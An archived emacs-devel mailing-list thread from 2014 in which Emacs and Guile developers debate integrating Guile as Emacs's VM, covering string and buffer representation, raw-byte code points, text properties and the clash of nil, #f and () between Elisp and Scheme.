  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27 15:41 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

>>> Could you move on to some other discussion?
>>> I mean, it's not like this is a problem we need to fix now (if ever).
>> Uh, Pango was an analogy example.  The actual question was whether Emacs
>> can or should delegate its character encoding/decoding processing (not
>> really significantly related to Pango but subject to similar
>> considerations) to GUILE's current mechanisms.  Which seem to be
>> libunistring via libiconv (both GNU libraries it would appear) rather
>> than the ICU mentioned elsewhere.
>
> And, again: it's not like this is a problem we need to fix now (if ever).
>
>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>> it is mostly complete, with strings/buffers being the most notable part
>> obliterating acceptable performance via thick glue layers between Emacs'
>> and GUILE's different implementations of similar concepts.
>
> Do you know this to be a fact?

<URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
them separate.

<URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
and Scheme strings".

I thought I read something from Robin about buffers/strings being a
performance issue, but searching on the respective developer lists
points rather to dynamic scopes and/or buffer-local variables.

> AFAIK, Guile-Emacs could perfectly live with having Emacs buffers,
> Emacs strings, and Scheme strings, with no extra cost, except when you
> *want* to convert between them (but as long as you don't run any
> Scheme, you shouldn't need/want to do any such conversion).

GUILE runs on a VM and obviously the native data types known to the VM
will be favored regarding its performance.  It may be that the cost of
processing strings is such that it will dominate the VM code processing,
but since one of the most fundamental data types of both Scheme and Lisp
are interned strings (namely symbols), I'd still expect quite a bit of
unnecessary churn when Emacs strings cannot just use GUILE primitives.
Not least of all maintaining two sets of primitives.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 15:41                         ` David Kastrup
@ 2014-09-27 15:57                           ` Stefan Monnier
  2014-09-27 16:25                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 15:57 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

>>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>>> it is mostly complete, with strings/buffers being the most notable part
>>> obliterating acceptable performance via thick glue layers between Emacs'
>>> and GUILE's different implementations of similar concepts.
>> Do you know this to be a fact?
> <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
> them separate.
> <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
> and Scheme strings".
> I thought I read something from Robin about buffers/strings being a
> performance issue, but searching on the respective developer lists
> points rather to dynamic scopes and/or buffer-local variables.

IOW, you do *not* know for a fact that this lack of unification is
a current source of performance problems.
Thought so.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 15:57                           ` Stefan Monnier
@ 2014-09-27 16:25                             ` David Kastrup
  2014-09-27 17:23                               ` Stefan Monnier
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27 16:25 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

>>>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>>>> it is mostly complete, with strings/buffers being the most notable part
>>>> obliterating acceptable performance via thick glue layers between Emacs'
>>>> and GUILE's different implementations of similar concepts.
>>> Do you know this to be a fact?
>> <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
>> them separate.
>> <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
>> and Scheme strings".
>> I thought I read something from Robin about buffers/strings being a
>> performance issue, but searching on the respective developer lists
>> points rather to dynamic scopes and/or buffer-local variables.
>
> IOW, you do *not* know for a fact that this lack of unification is
> a current source of performance problems.
> Thought so.

Shrug.  I'm currently working on integrating GUILE 2.0 into LilyPond,
and GUILE 2.0 has Unicode strings which are either UCS-8 or UCS-32 in
the strings and UTF-8 in string ports (which are sort of like Emacs
buffers on steroid withdrawal).  So at the current point of time, Emacs
and GUILE strings would need reencoding/decoding at every call gate
anyway as long as string access is not abstracted well enough in the
Emacs code base that the different internal coding would not require
code changes.  The VM costs would be negligible in comparison with that.

I don't think that having to retain a separate implementation of strings
in Emacs makes much sense in the course of integrating GUILE and Emacs.
"reencode at every call gate" is not feasible for tight interaction, and
tight interaction is desirable for an extension language after all.

In our case, LilyPond has a lot of head-scratching to do in order to
arrive at a state where GUILE and C++ strings can be passed through the
system reasonably efficient since LilyPond _is_ designed to tightly
interact with GUILE.  The basic expediency mechanism is to tell GUILE
"this is all latin-1" which it will then keep in UCS-8.  Whenever there
is an interest in Unicode string processing, we need to reencode.
LilyPond itself is actually talking UTF-8 to its users.  This kind of
"we work with UTF-8, but consider it to be UCS-8 instead since we cannot
or do not want to afford the price you demand for treating it as UTF-8"
is not really a satisfactory solution, and I expect this to become an
issue in other applications.

So I pretty much expect that we'll see GUILE migrating to an UTF-8-based
string representation eventually, with all the head-scratching regarding
indexing and rewriting strings (aset anybody?) that Emacs has seen.
In case that happens, matching Emacs strings would make a lot of sense.

Admittedly, that is more a problem of GUILE than Emacs.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
@ 2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
  2014-09-27 19:33                       ` Robin Templeton
  2 siblings, 0 replies; 261+ messages in thread
From: Taylan Ulrich Bayirli/Kammer @ 2014-09-27 17:04 UTC (permalink / raw)
  To: David Kastrup
  Cc: dmantipov, emacs-devel, handa, Stefan Monnier, Eli Zaretskii,
	stephen

David Kastrup <dak@gnu.org> writes:

> The GUILE bridge is there.  Robin Templeton's status of the port is
> that it is mostly complete, with strings/buffers being the most
> notable part obliterating acceptable performance via thick glue layers
> between Emacs' and GUILE's different implementations of similar
> concepts.
>
> Removing the thick glue layer requires that Emacs and GUILE strings
> (and Emacs buffers and GUILE whatever) become exchangeable and offer
> the same operations without impacting performance for either.

Guile supports extra/foreign types just fine (so-called SMOBs), which is
what strings and buffers are in Guile-Emacs so far, and if I understood
Robin right then the intention is to keep them so for a while, probably
even in the first "release" of Guile-Emacs.

SMOB types don't cause any extra memory usage or data access time AFAIK
so that probably works fine, the only problem being that Scheme and
Elisp strings are two different data types.  You get all of the other
benefits on the meanwhile which don't involve the mixing of Scheme and
Elisp code.

Taylan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 16:25                             ` David Kastrup
@ 2014-09-27 17:23                               ` Stefan Monnier
  2014-09-28 23:22                                 ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 17:23 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

> I don't think that having to retain a separate implementation of strings
> in Emacs makes much sense in the course of integrating GUILE and Emacs.

There's integration and integration.
Currently Guile-Emacs is about replacing the GC and byte-code
interpreter of Emacs with Guile's.  Most of the actual primitives used
are Emacs's own, AFAIK (with some exceptions, such as the things that
touch cons cells and numbers, IIUC).

I'm not really interested in spending time improving Guile.  The goal of
Guile-Emacs (from Emacs's point of view) is to use some pre-existing VM
so as to avoid spending time on Emacs's own.
So if we can't make use of Guile's strings because they're not good
enough, then we won't use them.

Of course, maybe we'll have to manipulate Guile's strings in order to
use Guile's FFI or some Scheme library.  If/when that becomes
a performance problem, we'll see what needs to be done about that.
Until then:

   it's not like this is a problem we need to fix now (if ever).


-- Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
  2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
@ 2014-09-27 19:33                       ` Robin Templeton
  2014-09-28  7:17                         ` David Kastrup
  2 siblings, 1 reply; 261+ messages in thread
From: Robin Templeton @ 2014-09-27 19:33 UTC (permalink / raw)
  To: emacs-devel

David Kastrup <dak@gnu.org> writes:

> The GUILE bridge is there.  Robin Templeton's status of the port is that
> it is mostly complete, with strings/buffers being the most notable part
> obliterating acceptable performance via thick glue layers between Emacs'
> and GUILE's different implementations of similar concepts.

Unifying the Elisp and Scheme string types is important, but more of a
long-term goal to allow convenient and efficient interaction between the
languages. Guile-Emacs's performance problems are mostly unrelated to
string handling. Elisp string representation is unchanged from standard
Emacs, except for trivial changes to make them an application-defined
Guile type.

-- 
Inteligenta persono lernas la lingvon Esperanton rapide kaj facile.
Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla,
belsona, Esperanto estas la praktika solvo de la problemo de universala
interkompreno. Lernu la interlingvon Esperanton!




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 19:33                       ` Robin Templeton
@ 2014-09-28  7:17                         ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-28  7:17 UTC (permalink / raw)
  To: emacs-devel

Robin Templeton <robin@terpri.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>> it is mostly complete, with strings/buffers being the most notable part
>> obliterating acceptable performance via thick glue layers between Emacs'
>> and GUILE's different implementations of similar concepts.
>
> Unifying the Elisp and Scheme string types is important, but more of a
> long-term goal to allow convenient and efficient interaction between the
> languages. Guile-Emacs's performance problems are mostly unrelated to
> string handling. Elisp string representation is unchanged from standard
> Emacs, except for trivial changes to make them an application-defined
> Guile type.

Ok, this is different _currently_ from the situation we have in LilyPond
where string interaction between C++, LilyPond, and GUILE was already
ubiquitous when GUILE 2.0 started supporting Unicode in its strings.

Emacs has strategies and conventions for passing strings between C
(literals, but also I/O and stuff) and Elisp reasonably cheaply whenever
cheap is an option.  When it is running on a GUILE VM, I don't see that
it will get by without addressing similar questions regarding the GUILE
domain.

Though to be honest: the typical Emacs programmer is not usually exposed
to the details of byte code in any way either.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27 17:23                               ` Stefan Monnier
@ 2014-09-28 23:22                                 ` Richard Stallman
  2014-09-29  1:33                                   ` Stefan Monnier
  2014-10-05  7:53                                   ` Mark H Weaver
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-09-28 23:22 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    So if we can't make use of Guile's strings because they're not good
    enough, then we won't use them.

Unfortunately, that would put a major crimp in interoperability between
Emacs Lisp programs and Scheme programs.

Can the Guile developers work on making Guile strings flexible
enough that Emacs can use them?  So that they can do the jobs
Emacs Lisp strings do?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-28 23:22                                 ` Richard Stallman
@ 2014-09-29  1:33                                   ` Stefan Monnier
  2014-09-29 20:48                                     ` Richard Stallman
  2014-10-05  7:53                                   ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-29  1:33 UTC (permalink / raw)
  To: Richard Stallman; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

> Unfortunately, that would put a major crimp in interoperability between
> Emacs Lisp programs and Scheme programs.

Such interoperability would be nice to have, indeed, but is not
absolutely necessary.  In any case this is a problem that Emacs can't
solve, so if you want to discuss it, please do that on Guile's
mailing-list.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-27  9:32           ` Eli Zaretskii
  2014-09-27 10:37             ` Stephen J. Turnbull
@ 2014-09-29 13:17             ` K. Handa
  1 sibling, 0 replies; 261+ messages in thread
From: K. Handa @ 2014-09-29 13:17 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: stephen, dmantipov, dak, emacs-devel

In article <837g0ptnlj.fsf@gnu.org>, Eli Zaretskii <eliz@gnu.org> writes:

> > No, you don't.  There's plenty of private space for those purposes
> > (unless you know of private character sets that use more than two
> > whole planes?)

> I take it that you have studied the charsets for which we use
> codepoints above 0x10FFFF, and concluded that they all fit in the
> 2*64K+6.4K PUA space provided by Unicode?  We have several quite large
> character sets which need that (grep mule-conf.el for ":unify-map" to
> see the list, and see etc/charsets/ for the map files).  I'm not sure
> the PUA space is large enough, but I didn't sum all the numbers.

> In any case, the question why we don't use PUA for this is best
> addressed to Handa-san (CC'ed).

The biggest character set is GB18030 which includes the
whole Unicode characters (including PUA) plus several its
own PUAs.  So, the Unicode character code points are simply
not enough to support the full GB18030.

In addition, almost all 2-byte CJK character sets contain
their own PUAs.  As Emacs doesn't unify characters in those
PUAs with Unicode' PUA characters, we can handle multiple
those character sets at the same time.

---
Kenichi Handa
handa@gnu.org



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-29  1:33                                   ` Stefan Monnier
@ 2014-09-29 20:48                                     ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-09-29 20:48 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

      In any case this is a problem that Emacs can't
    solve, so if you want to discuss it, please do that on Guile's
    mailing-list.

Guile developers need to talk with Emacs developers to find
a good solution.  I posted here since the Guile developers seem
to be here along with the Emacs developers.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-09-28 23:22                                 ` Richard Stallman
  2014-09-29  1:33                                   ` Stefan Monnier
@ 2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
                                                       ` (3 more replies)
  1 sibling, 4 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05  7:53 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, Stefan Monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:
>     So if we can't make use of Guile's strings because they're not good
>     enough, then we won't use them.
>
> Unfortunately, that would put a major crimp in interoperability between
> Emacs Lisp programs and Scheme programs.
>
> Can the Guile developers work on making Guile strings flexible
> enough that Emacs can use them?  So that they can do the jobs
> Emacs Lisp strings do?

I would like to change Guile's internal string representation to use a
generalization of UTF-8, as used by Emacs.  There are two sticking
points that require more thought, however:

* I'm concerned that there are security implications to supporting the
  "raw byte" code points.  I can expand on this more if you'd like.

  However, I think this will not be a problem, because the
  string<->bytevector conversion procedures could support two modes of
  operation: one mode that supports these raw bytes, for use by emacs
  and maybe some other purposes (e.g. dealing with POSIX file names),
  and another mode that refuses to accept or produce invalid UTF-8,
  which would be used by programs where security is a concern.  I'm
  inclined to make the standard Scheme procedures use the strict mode
  by default.

* I'm not sure that Guile strings should include property lists.  One
  can reasonably assume that competent Elisp programmers will keep in
  mind that Elisp strings are more than just characters, but we cannot
  expect that of Scheme programmers, and they've never had any tools to
  deal with it in any case.  Emacs lisp includes procedures such as
  'substring-no-properties', but Scheme has never had anything like
  that.

Supporting property lists in Scheme raises difficult questions
such as:

 * What should the Scheme procedures 'string=?' and 'equal?' do when
   comparing two strings with the equal character sequences but
   unequal property lists?

 * Should Scheme procedures such as 'substring', 'string-append',
   'string-upcase', etc, propagate the associated property list
   data?

 * Are there security implications to carrying around and possibly
   propagating (via Scheme's "substring") extra information that is
   effectively invisible to all procedures that have ever been
   available in Scheme?

 * What should Scheme's 'write' do when applied to a string that
   includes a property list?  ('write' is analogous to 'prin1').

Security concerns are more important for Guile than for Emacs, because
Guile is already being used to implement network programs such as web
servers, and generally aims to support a much wider range of
applications.

At the very least, we can plan to eventually make Emacs strings
representable as Guile strings plus property lists.  Going further
will require more consideration, I think.

* * *

While we're on the subject of interoperability between Emacs Lisp and
Scheme programs, I'm concerned about nil.  Modern Scheme requires that
() and #f are distinct objects, and that () is treated as true by 'if'.
This has been the case for long enough now that it's not uncommon for
modern Scheme code to depend on these facts.  Of course, Elisp code
depends on the end-of-list and false values being the same object.

The way we're coping with this is by having three distinct objects in
Guile: (), #f, and #nil, where both () and #nil are considered
end-of-list markers by 'null?', both #f and #nil are considered false by
Scheme 'if', and all three are seen as null by Elisp.

First of all, clearly this is not quite correct.  Scheme code might
assume that if a value is false, it cannot be the empty list, or vice
versa, but the hope is that it will mostly work in practice.

However, I see a problem that will become more common if Scheme and
Elisp code become more intertwined.  The problem occurs when Elisp code
sees that a value 'x' is null and then copies it somewhere, where the
original 'x' was conceptually an end-of-list, but the copy is
conceptually a boolean false (or vice versa).

(I'm aware that for some Elisp values, it may not even be possible to
say it's "conceptually an end-of-list" or "conceptually a boolean
false", but please bear with me).

The problem comes when 'x' originated in Scheme code as (), is later
copied by Elisp code into something that's conceptually a boolean, and
then that copy is inspected by Scheme code.  The intent was that the
copied boolean would be false, but the Scheme code will see () and treat
it as true.

What do you think?  Do I worry too much? :)

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
@ 2014-10-05  9:01                                     ` David Kastrup
  2014-10-05 10:43                                     ` Stephen J. Turnbull
                                                       ` (2 subsequent siblings)
  3 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-05  9:01 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier,
	eliz, stephen

Mark H Weaver <mhw@netris.org> writes:

> * I'm not sure that Guile strings should include property lists.

I already mentioned that string ports could be turned into the basic
underlying data representation for Emacs buffers.  That's one case where
it is quite obvious that a string port alone is not a sufficient
representation.

> One can reasonably assume that competent Elisp programmers will keep
> in mind that Elisp strings are more than just characters, but we
> cannot expect that of Scheme programmers, and they've never had any
> tools to deal with it in any case.  Emacs lisp includes procedures
> such as 'substring-no-properties', but Scheme has never had anything
> like that.
>
> Supporting property lists in Scheme raises difficult questions
> such as:
>
>  * What should the Scheme procedures 'string=?' and 'equal?' do when
>    comparing two strings with the equal character sequences but
>    unequal property lists?
>
>  * Should Scheme procedures such as 'substring', 'string-append',
>    'string-upcase', etc, propagate the associated property list
>    data?
>
>  * Are there security implications to carrying around and possibly
>    propagating (via Scheme's "substring") extra information that is
>    effectively invisible to all procedures that have ever been
>    available in Scheme?
>
>  * What should Scheme's 'write' do when applied to a string that
>    includes a property list?  ('write' is analogous to 'prin1').

I should think that GOOPS, the basis for GUILE's builtin object
hierarchy, basically provides all the necessary mechanisms for
transparently making "richer" string variants maintain their additional
data when being manipulated by standard operations.

So while Emacs development would likely benefit from the willingness to
refactor some string internals in a different manner, ultimately the
work of Emacs data implementors should not require tight interaction
with GUILE development.

> While we're on the subject of interoperability between Emacs Lisp and
> Scheme programs, I'm concerned about nil.

[...]

> The problem comes when 'x' originated in Scheme code as (), is later
> copied by Elisp code into something that's conceptually a boolean, and
> then that copy is inspected by Scheme code.  The intent was that the
> copied boolean would be false, but the Scheme code will see () and treat
> it as true.
>
> What do you think?  Do I worry too much? :)

No.  It will be the main recurring interoperation headache.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
@ 2014-10-05 10:43                                     ` Stephen J. Turnbull
  2014-10-05 11:10                                       ` David Kastrup
  2014-10-05 14:30                                       ` Mark H Weaver
  2014-10-05 21:49                                     ` Richard Stallman
  2014-10-05 21:49                                     ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 10:43 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

Mark H Weaver writes:

 > I would like to change Guile's internal string representation to use a
 > generalization of UTF-8, as used by Emacs.  There are two sticking
 > points that require more thought, however:
 > 
 > * I'm concerned that there are security implications to supporting
 >   the "raw byte" code points.

There are greater security implications to using the full repertoire
of Unicode (so-called confusables for a start).

 >   However, I think this will not be a problem, because the
 >   string<->bytevector conversion procedures could support two modes of
 >   operation: one mode that supports these raw bytes, for use by emacs
 >   and maybe some other purposes (e.g. dealing with POSIX file names),
 >   and another mode that refuses to accept or produce invalid UTF-8,

I'm not sure what you mean by "mode", but this behavior should be
decided for each stream.  IMO Python does this correctly (although its
internal representation is fixed-width, not UTF-8).  Specifically, raw
bytes in I/O streams are treated as errors, and when encountered an
error handler (which is specified stream-by-stream) decides how to
treat them.

Besides the in band "special character" representation, 'strict'
(raise error) must be provided.

Other handlers provided by Python include 'ignore' (drop from the
stream), 'replace' (with a constant replacement character),
'backslashreplace' (replace with a hexadecimal representation such as
"\x1F4A9") and 'xmlreplace' (replace with a character entity) handlers
are provided.

 > Supporting property lists in Scheme raises difficult questions
 > such as:

Difficult, really?

 >  * What should the Scheme procedures 'string=?' and 'equal?' do when
 >    comparing two strings with the equal character sequences but
 >    unequal property lists?

Ignore the property list.

 >  * Should Scheme procedures such as 'substring', 'string-append',
 >    'string-upcase', etc, propagate the associated property list
 >    data?

Ignore the property list.

 >  * Are there security implications to carrying around and possibly
 >    propagating (via Scheme's "substring") extra information that is
 >    effectively invisible to all procedures that have ever been
 >    available in Scheme?

Ignore the property list.

 >  * What should Scheme's 'write' do when applied to a string that
 >    includes a property list?  ('write' is analogous to 'prin1').

Ignore the property list.

There, that wasn't hard, was it?

Scheme itself really needs only to provide a setter and a getter for
the property list, and leave everything else up to Emacs (at first,
anyway).  If you're really worried about the security implications,
provide a interpreter instance switch at invocation time (or even
compile time) so that feature is only available in invocations that
explicitly request it.  This would default to on for Emacs processes,
off for "vanilla" Guile, and other applications that embed special
configurations of Guile can make their own choice.

 > Security concerns are more important for Guile than for Emacs, because
 > Guile is already being used to implement network programs such as web
 > servers, and generally aims to support a much wider range of
 > applications.

Obviously, you don't know Emacs very well.  Emacs is the Swiss Army
knife of the software world.  It is an operating system, a system
library, an application development platform and an application.  (We
also walk dogs.)

 > What do you think?  Do I worry too much [about nothing]? :)

Listen to your Uncle David on this one.  You should treat every
instance of nil as a biohazard.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 10:43                                     ` Stephen J. Turnbull
@ 2014-10-05 11:10                                       ` David Kastrup
  2014-10-05 11:56                                         ` Stephen J. Turnbull
  2014-10-05 14:30                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-05 11:10 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

>  > What do you think?  Do I worry too much [about nothing]? :)
>
> Listen to your Uncle David on this one.  You should treat every
> instance of nil as a biohazard.

That would make about as much sense as treating every bacterium as a
biohazard.  The nil problem is going to be defining the relation between
Elisp and Scheme programming like pointers define the relation between C
and algorithms.

The Fortran language is defined in a manner that when you use aliasing,
anything can happen.

The C language is defined in a manner that when you don't use aliasing,
nothing can happen.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 11:10                                       ` David Kastrup
@ 2014-10-05 11:56                                         ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 11:56 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

David Kastrup writes:

 > like pointers define the relation between C and algorithms.

Did somebody mention biohazards?

It seems to me that the analogy between passing Lisp nil to Scheme and
passing C pointers to anything is quite good at a high level.  Every
instance must be check up down and sideways for possible hazards.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 10:43                                     ` Stephen J. Turnbull
  2014-10-05 11:10                                       ` David Kastrup
@ 2014-10-05 14:30                                       ` Mark H Weaver
  2014-10-05 15:48                                         ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05 14:30 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

>  > What do you think?  Do I worry too much [about nothing]? :)
>
> Listen to your Uncle David on this one.  You should treat every
> instance of nil as a biohazard.

If you had actually read what I wrote, you'd know that in the case I
outlined, there is no instance of nil at all.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 14:30                                       ` Mark H Weaver
@ 2014-10-05 15:48                                         ` Stephen J. Turnbull
  2014-10-05 18:29                                           ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 15:48 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

Mark H Weaver writes:

 > in the case I outlined, there is no instance of nil at all.

If you say so.






^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 15:48                                         ` Stephen J. Turnbull
@ 2014-10-05 18:29                                           ` Mark H Weaver
  0 siblings, 0 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05 18:29 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Mark H Weaver writes:
>
>  > in the case I outlined, there is no instance of nil at all.
>
> If you say so.

Am I mistaken?  Where is the instance of nil?

    Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
  2014-10-05 10:43                                     ` Stephen J. Turnbull
@ 2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
                                                         ` (2 more replies)
  2014-10-05 21:49                                     ` Richard Stallman
  3 siblings, 3 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    * I'm concerned that there are security implications to supporting the
      "raw byte" code points.  I can expand on this more if you'd like.

I'd like to know how it is that "raw bytes" have security implications.
Are there programs that make assumptions about the contents of strings?
That seems like bad design.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
                                                       ` (2 preceding siblings ...)
  2014-10-05 21:49                                     ` Richard Stallman
@ 2014-10-05 21:49                                     ` Richard Stallman
  2014-10-06  3:34                                       ` Stephen J. Turnbull
  2014-10-10 20:41                                       ` Mark H Weaver
  3 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Supporting property lists in Scheme raises difficult questions

Do you mean text properties in strings, as in Emacs Lisp?  These are
more complicated than an ordinary property list on an object as a
whole.

    such as:

     * What should the Scheme procedures 'string=?' and 'equal?' do when
       comparing two strings with the equal character sequences but
       unequal property lists?

     * Should Scheme procedures such as 'substring', 'string-append',
       'string-upcase', etc, propagate the associated property list
       data?

     * What should Scheme's 'write' do when applied to a string that
       includes a property list?  ('write' is analogous to 'prin1').

The obvious first suggestion is to handle each one as Emacs Lisp does.
For printing, a different syntax might be needed to fit in with Scheme
printed representation conventions, but that is ok.

     * Are there security implications to carrying around and possibly
       propagating (via Scheme's "substring") extra information that is
       effectively invisible to all procedures that have ever been
       available in Scheme?

There are many ways to pass data from one piece of Scheme code to
another.  Is there any real, usable "security" now, that this would
reduce?  Can you give an example?

Given a self-contained Scheme program, it should be easy to determine
whether it ever examines or sets string text properties.  Is that enough
to provide the same "security" benefits in practice?

-- 
Dr Richard Stallman
President, Free Software Foundation
